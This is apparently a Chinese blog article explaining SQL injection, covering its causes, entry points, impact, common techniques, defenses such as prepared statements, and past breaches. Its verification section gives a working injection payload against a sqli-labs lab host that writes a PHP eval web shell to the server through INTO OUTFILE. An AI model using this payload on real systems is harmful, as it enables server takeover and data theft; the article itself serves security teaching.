SQL 注入漏洞详解
SQL 注入漏洞详解
漏洞描述
sql注入漏洞是指恶意用户在应用与数据库交互的地方利用非法的操作获取数据库内容从以下两点分析:
- 没有对用户输入的数据进行充分的过滤和验证,导致一些用户利用此漏洞向数据库插入恶意sql语句非法请求数据库从而获得一些敏感数据
- 在与数据库交时未对用户可控参数进行足够的过滤,便将参数内容拼接到SOL 语句中,修改原有的sql语句逻辑,从而对数据库进行非法操作。
漏洞原理
通常在与数据库交互的地方,开发人员在处理和数据库交互时,未设置充足的过滤与验证或没对用户输入的参数进行控制时,非法用户利用漏洞,打破原有的sql语句,篡改原有语句的逻辑,从而使得数据库执行被篡改的sql语句,请求非正常授权内容。严重导致数据库数据泄露,数据篡改等
漏洞场景
sql注入漏洞一般存在于与数据交互的地方,例如:
- url参数传递
- 表单提交
- 搜索框
- http头文件
- cookie
- User-Agent
- Referer
漏洞评级
漏洞等级:高危
漏洞危害
SQL注入漏洞可能会导致严重的安全问题,其中包括
- 数据库数据泄露
- 数据库篡改
- 拒绝服务
- 数据库信息丢失
- 如果数据库权限分配不当或本身就存在缺陷,那么攻击者就会通过该漏洞直接获取webshell或服务器权限
漏洞验证
联合查询时使用into outfile函数进行文件上传
回显位写入一句话木马 最后加上函数和要上传的绝对路径
http://10.9.47.77/sqli-labs/Less-2/?id=2 and 1=2 union select 1,"<?php @eval ($_REQUEST[777]);?>",3 into outfile "C:/phpstudy_2016/www/yjh.php" --+

文件上传成功使用密码777进行连接测试phpinfo

打开蚁剑进行连接

漏洞利用
- 五大注入手法
- 联合查询注入
- 报错注入
- 布尔盲注
- 延时注入
- 其他注入
- 宽字节注入
- HTTP头部注入
- cookie注入
- User-Agent注入
- Base64注入
- Referer注入
- OOB 注入
防御方案
-
避免采用拼接的方式构造 SQL 语句,可以采用PDO预编译等技术;
-
对进入 SQL 语句的参数进行足够过滤。
-
部署安全设备,如 WAF。定制武器库
典型案例
2008年,Heartland Payment Systems公司遭受了一次SQL注入攻击,导致超过1300万张信用卡信息被窃取。攻击者利用了Heartland Payment Systems公司的网站上存在的SQL注入漏洞,注入了恶意代码,从而获取了信用卡信息。
2015年,美国联邦政府办公室人事管理局遭受了一次SQL注入攻击,导致超过2100万名联邦雇员的个人信息被窃取。攻击者利用了该机构网站上存在的SQL注入漏洞,注入了恶意代码,从而获取了个人信息。
2016年,菲律宾选举委员会遭受了一次SQL注入攻击,导致超过550万名选民的个人信息被窃取。攻击者利用了该机构网站上存在的SQL注入漏洞,注入了恶意代码,从而获取了选民的个人信息。
这些案例表明,SQL注入漏洞是一种非常严重的安全威胁,可以导致大量敏感数据被窃取。因此,开发人员和网站管理员需要认真对待SQL注入漏洞,采取必要的措施来防范和修复这种漏洞。
相关文章:
SQL 注入漏洞详解
SQL 注入漏洞详解 漏洞描述 sql注入漏洞是指恶意用户在应用与数据库交互的地方利用非法的操作获取数据库内容从以下两点分析: 没有对用户输入的数据进行充分的过滤和验证,导致一些用户利用此漏洞向数据库插入恶意sql语句非法请求数据库从而获得一些敏感数据在与数…...
关于阿里云 ACK ingress部分补充
强调: 本文只是作为记录,过一段时间会删除 跟唐老师学习网络 一 Nginx Ingress管理 ① 流量走向 需求: 应用绑定LoadBalance,会自动创建或使用SLBeip:port --> nodeport_ip:port --> service_ip:port --> pod_ip:port 支持的注解 通过…...
轻量封装WebGPU渲染系统示例<22>- 渲染到纹理(RTT)(源码)
当前示例源码github地址: https://github.com/vilyLei/voxwebgpu/blob/feature/rendering/src/voxgpu/sample/RTTTest.ts 当前示例运行效果: 此示例基于此渲染系统实现,当前示例TypeScript源码如下: export class RTTTest {private mRscene new RendererScene()…...
官方Redis视图化工具Redisinsight
一、下载最新版本的 docker pull redislabs/redisinsight mkdir /data/redisinsight docker run -d -u root -p 8001:8001 -v /etc/localtime:/etc/localtime -v /data/redisinsight:/db --restartunless-stopped redislabs/redisinsight:latest 二、浏览器打开 http://192…...
Vue+Django REST framework 打造生鲜电商项目课程下载树大根深
VueDjango REST framework 打造生鲜电商项目 链接:https://pan.baidu.com/s/1kEDxPsoTYSVWPYB2H0jbBw?pwd6666 提取码:6666Django是高水准的Python编程语言驱动的一个开源模型.视图,控制器风格的Web应用程序框架,它…...
react中遇到的分页问题
问题: 1.使用useState时不能够进行当前页码的改变,数据不会随着页码变化 2.删除当前页的最后一条数据时,页码返回上一页但是数据为空 解决: 1.由于useState和useRef的区别那我们就不考虑使用useState 2.再删除的逻辑当中添加判断条…...
变电站自动化系统中的安全措施分析及应用-安科瑞
安科瑞电气股份有限公司 上海嘉定 201801 摘要:阐述变电运行中的问题,电气自动化系统与安全运行措施,包括自动控制设备的投入,电气自动 化与计算机技术相、设备数据的采集与处理、自动化系统的升级、人工智能技术的应用。 关键…...
【MongoDB】索引 – 文本索引
一、准备工作 这里准备一些数据 db.books.insertMany([{_id: 1, name: "Java", description: "java 入门图书", translation: [{ language: "english", description: "java basic book" }]},{_id: 2, name: "C", descript…...
【广州华锐互动】影视制作VR在线学习:身临其境,提高学习效率
随着科技的不断发展,影视后期制作技术也在日新月异。然而,传统的教学方式往往难以满足学员的学习需求,无法充分展现影视后期制作的魅力和潜力。近年来,虚拟现实(VR)技术的崛起为教学领域带来了新的机遇。通过VR教学课件࿰…...
Linux 命令:PS(进程状态)
1. 写在前面 本文主要介绍:Linux 下常用命令 PS —— 进程状态; 公众号: 滑翔的纸飞机 2. PS — 介绍(进程状态) ps 命令:显示 Linux 系统中运行进程有关的信息。 rootdev:~# psPID TTY TIME C…...
手把手教你:LLama2原始权重转HF模型
LLama2是meta最新开源的语言大模型,训练数据集2万亿token,上下文长度由llama的2048扩展到4096,可以理解和生成更长的文本,包括7B、13B和70B三个模型,在各种基准集的测试上表现突出,该模型可用于研究和商业用…...
后入能先出,一文搞懂栈
目录 什么是栈数组实现链表实现栈能这么玩总结 什么是栈 栈在我们日常编码中遇到的非常多,很多人对栈的接触可能仅仅局限在 递归使用的栈 和 StackOverflowException,栈是一种后进先出的数据结构(可以想象生化金字塔的牢房和生化角斗场的狗洞)。 栈&…...
京东API接口的应用场景:商品信息查询,商品详情获取
京东API接口的应用场景涵盖了电商业务的各个方面,通过API的方式,开发者可以方便地获取京东平台上的商品信息、用户信息、订单信息等,进而进行个性化的应用开发。以下是几个典型的应用场景: 商品信息查询:通过京东API接…...
微信小程序使用iconfont坑
下载解压 font-face {font-family: "iconfont"; /* Project id 4322044 */src: url(iconfont.woff2?t1699515502419) format(woff2),url(iconfont.woff?t1699515502419) format(woff),url(iconfont.ttf?t1699515502419) format(truetype); }.iconfont {font-famil…...
最新Cocos Creator 3.x 如何动态修改3D物体的透明度
Cocos Creator 3.x 的2D UI有个组件UIOpacity组件可以动态修改UI的透明度,非常方便。很多同学想3D物体上也有一个这样的组件来动态的控制与修改3D物体的透明度。今天基于Cocos Creator 3.8 来实现一个可以动态修改3D物体透明度的组件Opacity3D。 对啦!这里有个游戏…...
golang 2018,go 1.19安装Gin
GOPROXYhttps://mirrors.aliyun.com/goproxy/ 一致提示URL不能有点,给我整郁闷了,换了这个地址好了 但是一致提示zip的包问题,最后还是不行又换回七牛 NEWBEE! [GIN-debug] Environment variable PORT is undefined. Using por…...
常用的三角函数公式
sin 2 x cos 2 x 1 \sin ^2 x \cos ^2 x 1 sin2xcos2x1 tan x sin x cos x \tan x \dfrac{\sin x}{\cos x} tanxcosxsinx cot x 1 tan x cos x sin x \cot x \dfrac{1}{\tan x}\dfrac{\cos x}{\sin x} cotxtanx1sinxcosx sec …...
【MySQL】一文学会所有MySQL基础知识以及基本面试题
文章目录 前言 目录 文章目录 前言 一、主流数据库以及如何登陆数据库 二、常用命令使用 三、SQL分类 3.1 存储引擎 四、创建数据库如何设置编码等问题 4.1操纵数据库 4.2操纵表 五、数据类型 六、表的约束 七、基本查询 八、函数 九、复合查询 十、表的内连和外连 十一、索引…...
self.register_buffer方法使用解析(pytorch)
self.register_buffer就是pytorch框架用来保存不更新参数的方法。 列子如下: self.register_buffer("position_emb", torch.randn((5, 3)))第一个参数position_emb传入一个字符串,表示这组参数的名字,第二个就是tensor形式的参数…...
关于卷积神经网络中如何计算卷积核大小(kernels)
首先需要说明的一点是,虽然卷积层得名于卷积( convolution )运算,但我们通常在卷积层中使用更加直观的计算方式,叫做互相关( cross-correlation )运算。 也就是说,其实我们现在在这里…...
企业级RAG系统工程化实践:Java技术栈构建Agentic智能体平台
1. 项目概述:一个企业级RAG系统的工程化实践最近几年,AI领域最火的概念莫过于RAG(检索增强生成)和Agent(智能体)了。作为一个在Java后端领域摸爬滚打了十多年的老码农,我亲眼见证了从CRUD到微服…...
SAP MM | S4500 第五章——库存物料与消耗型物料采购
1. 单元概述与学习目标 作为 SAP 顾问,理解物料在系统中的“去向”是构建高效采购流程的基石。在 S/4HANA 中,采购业务根据物料是否进入库房管理,划分为库存采购与消耗型采购。本单元旨在通过深度对比这两者的业务流转,从底层逻辑上掌握 PR 到 PO 的转换以及后续的评估差异…...
Path of Building终极指南:免费离线角色构建工具完全解析
Path of Building终极指南:免费离线角色构建工具完全解析 【免费下载链接】PathOfBuilding Offline build planner for Path of Exile. 项目地址: https://gitcode.com/GitHub_Trending/pa/PathOfBuilding Path of Building是一款专为《流放之路》玩家设计的…...
分治算法之基于分治的快速排序
基于分治的快速排序下面我们针对数组 [4, 1, 6, 9, 8, 5, 2, 3, 0, 7] 进行排序来讲解示例:首先第一步我们需要将大问题分解为小问题。假设我们要将数组分为两个更小的子问题,我们可以有以下的分解方式:[4] [1, 6, 9, 8, 5, 2, 3, 0, 7] [4, …...
Zotero AI插件:5步打造你的智能文献助手,让学术研究效率翻倍
Zotero AI插件:5步打造你的智能文献助手,让学术研究效率翻倍 【免费下载链接】zotero-gpt GPT Meet Zotero. 项目地址: https://gitcode.com/gh_mirrors/zo/zotero-gpt 还在为堆积如山的文献感到焦虑吗?每天面对几十篇论文,…...
G-Helper华硕笔记本控制工具:如何实现轻量级性能管理与硬件优化
G-Helper华硕笔记本控制工具:如何实现轻量级性能管理与硬件优化 【免费下载链接】g-helper Lightweight, open-source control tool for ASUS laptops and ROG Ally. Manage performance modes, fans, GPU, battery, and RGB lighting across Zephyrus, Flow, TUF, …...
中小企业流程目标制定:三步找准适合你的发展节奏-佛山鼎策创局破局增长咨询
好多中小企业的老板还有管理者,在动手制定流程之际,常常容易陷入两种极端的情形。其一,他们会径直套用大公司那般复杂繁琐的体系,从而致使员工们怨声连连,工作积极性遭受极大打击,整个企业运营效率变得很低…...
幻境·流金企业实操:金融年报数据图表→电影级信息图AI转化全流程
幻境流金企业实操:金融年报数据图表→电影级信息图AI转化全流程 1. 企业数据可视化的新机遇 金融年报数据分析是每个企业的必修课,但传统的柱状图、折线图往往让读者昏昏欲睡。如何将枯燥的财务数据转化为引人入胜的视觉故事?这就是「幻境流…...
QT 5.14.2安卓开发环境保姆级配置:从MaintenanceTool插件到解决‘Platform tools installed’报错
QT 5.14.2安卓开发环境配置全指南:从插件补装到疑难排错 第一次在QT中配置安卓开发环境,就像给一辆燃油车加装电动引擎——看似简单,实则暗藏玄机。许多开发者在安装QT时为了节省空间,往往跳过了安卓组件,等到真正需要…...
从‘增删改查’到用户故事:PlantUML用例图实战,教你识别真正的系统功能边界
从用户目标到系统边界:用PlantUML用例图重构设计思维 在软件开发领域,我们常常陷入一种技术陷阱——把数据库的"增删改查"直接映射为系统功能,却忽略了用户真正的需求本质。这种功能分解式的设计思维,往往导致系统边界模…...
